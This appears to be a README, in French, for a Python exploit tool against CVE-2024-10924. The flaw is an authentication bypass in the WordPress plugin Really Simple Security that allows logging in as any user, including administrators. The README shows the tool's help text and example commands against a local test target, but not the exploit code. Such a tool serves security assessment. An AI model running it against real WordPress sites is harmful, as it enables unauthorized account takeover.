
Exploit Python pour le contournement d'authentification CVE-2024-10924 dans Really Simple Security < 9.1.2. Permet une connexion non authentifiée en tant que n'importe quel utilisateur WordPress existant, y compris les administrateurs, lorsque l'authentification à deux facteurs est activée.
Ceci est un programme Python3 qui exploite la vulnérabilité de contournement d'authentification Really Simple Security < 9.1.2 (CVE-2024-10924).
Cet outil est destiné aux ingénieurs en sécurité et aux professionnels de la sécurité applicative pour des évaluations de sécurité. Veuillez utiliser cet outil de manière responsable. Je décline toute responsabilité quant à la manière dont quelqu'un utilise cette application. Je NE suis PAS responsable des dommages causés ou des crimes commis en utilisant cet outil.
$ ./exploit.py --help
usage: exploit.py [-h] -t TARGET [-uid USER_ID] [-v]
Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - v1.0 (2024-11-19)
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL of the target WordPress
-uid USER_ID, --user-id USER_ID
Victim user ID (1 is usually the admin).
-v, --verbose verbose mode
./exploit.py -t http://localhost:1337
./exploit.py -t http://localhost:1337 -uid 1 -v
Une application vulnérable peut être configurée en utilisant ce dépôt.
Voir le fichier LICENSE pour les détails.